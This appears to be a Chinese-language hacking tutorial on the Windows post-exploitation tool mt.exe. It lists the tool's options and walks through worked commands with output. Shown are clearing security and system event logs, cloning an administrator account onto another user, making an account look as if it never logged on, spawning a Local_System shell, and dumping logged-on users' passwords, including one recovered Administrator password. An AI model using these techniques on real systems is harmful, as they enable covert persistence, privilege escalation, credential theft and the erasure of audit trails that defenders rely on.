用法: mt.exe <选项> 选项 : -filter ---更改 TCP/IP 过滤器的开头状态 -addport ---添加端口到过滤器的允许列表 -setport ---设置端口作为过滤器的允许列表 -nicinfo ---列出 TCP/IP 界面信息 -pslist ---列出活动进程 -pskill ---杀毒指定进程 -dlllist ---列出指定进程的 DLL -sysinfo ---列出系统信息 -shutdown ---关闭系统 -reboot ---重启系统 -poweroff ---关闭电源 -logoff ---注销当前用户会话 -chkts ---检查终端服务信息 -setupts ---安装终端服务 -remts ---卸载终端服务 -chgtsp ---重置终端服务端口 -clog ---清除系统日志 -enumsrv ---列出所有服务 -querysrv ---列出指定服务的详细信息 -instsrv ---安装一个服务 -cfgsrv ---更改服务配置 -remsrv ---卸载指定服务 -startsrv ---启动指定服务 -stopsrv ---停止指定服务 -netget ---从 http/ftp 下载 -redirect ---端口重定向 -chkuser ---列出所有账户、sid 和 anti 克隆 -clone ---克隆 admin 到目标 -never ---设置账户看上去从未登录 -killuser ---删除账户,甚至是 "guest" 也可删除 -su ---以 Local_System 权限运行进程 -findpass ---显示所有已登录用户的口令 -netstat ---列出 TCP 连接 -killtcp ---杀死 TCP 连接 -psport ---映射端口到进程 -touch ---设置文件日期和时间到指定值 -secdel ---安全擦除文件或目录占用的空间 -regshell ---进入一个控制台注册表编辑器 -chkdll ---检测 gina dll 后门
一MT.EXE –filter Usage: MT -filter <ON|OFF> ----Enabld|Disable TCP/IP Filter. 这个是打开关闭TCP/IP筛选的 二MT.EXE-pslist 列出系统活动进程 三MT.EXE -pskill Usage: mt -pskill <PID|ProcessName> 杀进程 我们使用MyIE.exe这个软件作为测试,看看他们能不能杀死这个进程,输入MT –PSLIST,我们知道MyIE.exe的PID值是924,于是输入:mt.exe -pskill 924
四mt.exe -dlllist Usage: mt -dlllist <PID|ProcessName> 列出进程中相关的DLL文件
五 mt.exe –sysinfo 列出系统信息
六mt.exe -shutdown ---Shutdown system. -reboot ---Reboot system. -poweroff ---Turn off power. -logoff ---Logoff current user’s session. 这4个命令就不说了,和系统工具shutdown不一样的是,输入之后没有任何的提示,直接关机
七 mt.exe -chkts ---Check Terminal Service info. -setupts ---Install Terminal Service. 安装终端服务 -remts ---Remove Terminal Service. 卸载终端服务 -chgtsp ---Reset Terminal Service port. 重新设置终端端口号 这4个命令是和Terminal相关的
八mt.exe -clog用来清除记录,我们输入: Usage: mt -clog <app|sec|sys|all> ---Clean Application|Security|System|All logs. 从上面的可以看出,我们可以清除 "应用程序" "安全性" "系统"3个日志 九mt.exe-enumsrv 列出所有的服务
十mt.exe -clone Usage: mt -clone <SourUser> <DestUser> 克隆账号 新建一个用户yun,现在我要将管理员账号lin克隆为账号yun,输入: D:/hack>mt -clone lin yun Fail to Open SAM Key, 操作成功完成。 mt.exe -clone lin yun Fail to Open SAM Key, 操作成功完成。 可能是不支持XP系统,虽然提示说操作成功,可是事实上,使用yun登陆的时候,还是没有成功,可能也是有其缺陷或者是我自己操作失败吧.
十一D:/>mt -never -never ---Set account looks like never logged on. 它可以设置使用户看起来从来没有登陆过,在我的系统里面有2个用户,一个是管理员lin,另外一个是公用的帐户316,现在我把316设置为从不登陆的状态.输入 D:/>mt -never 316 Require System Privilege.提示没有权限,于是 D:/>mt -su 打开新的CMD窗口,输入 Microsoft Windows XP [版本 5.1.2600] (C) 版权所有 1985-2001 Microsoft Corp. C:/WINDOWS/system32>d: D:/>mt -never 316 Fail to Set F Value. D:/>net user 316 用户名 316 全名 316 注释 用户的注释 国家(地区)代码 000 (系统默认值) 帐户启用 Yes 帐户到期 从不 上次设置密码 2004/5/19 下午 08:22 密码到期 从不 密码可更改 2004/5/19 下午 08:22 需要密码 Yes 用户可以更改密码 Yes 允许的工作站 All 登录脚本 用户配置文件 主目录 上次登录 从不 可允许的登录小时数 All 本地组成员 *Users 全局组成员 *None 命令成功完成。 D:/> 可以看出来已经修改成功了,虽然显示的是Fail to Set F Value.,但还是成功了.这个功能和never.exe是一样的,只是将特定的的帐户上回登陆时间改为帐户从来没有登陆上过系统. 成功条件:你要有local system权限
十二 -su ---Run process as Local_System privilege. 以系统特权运行进程,在管理员登陆的情况下输入MT –su,马上弹出另外一CMD窗口,在这个窗口中,可以做任何我们想做的事情,这个也是系统的最高权限了. 20 -regshell ---Enter a console registry editor. 以CMD的方式编辑注册表,输入在CMD下不是很方便,不过有时候也是很使用的,输入: D:/>mt -regshell HKLM/>dir <SubKey> HARDWARE <SubKey> SAM <SubKey> SECURITY <SubKey> SOFTWARE <SubKey> SYSTEM Total: 5 SubKey, 0 Value. HKLM/>quitreg D:/> 和真实环境没有什么区别.
十三 mt.exe -psport ---Map ports to processes. 显示进程的端口
十四 mt.exe -findpass ---Show all logged on user’s pass. 得到所有登陆用户的密码,由于这个命令是For NT/2K only.,所以我在客户机上面测试这个功能,输入,很容易就得到了密码: G:/WINNT/system32>mt -findpass mt -findpass The logon information : Domain : 316-2AS8L1B1FL5 Username : Administrator Password : winyaj G:/WINNT/system32> 这个比findpass.exe还方便一些,不需要知道用户进程的PID值.
|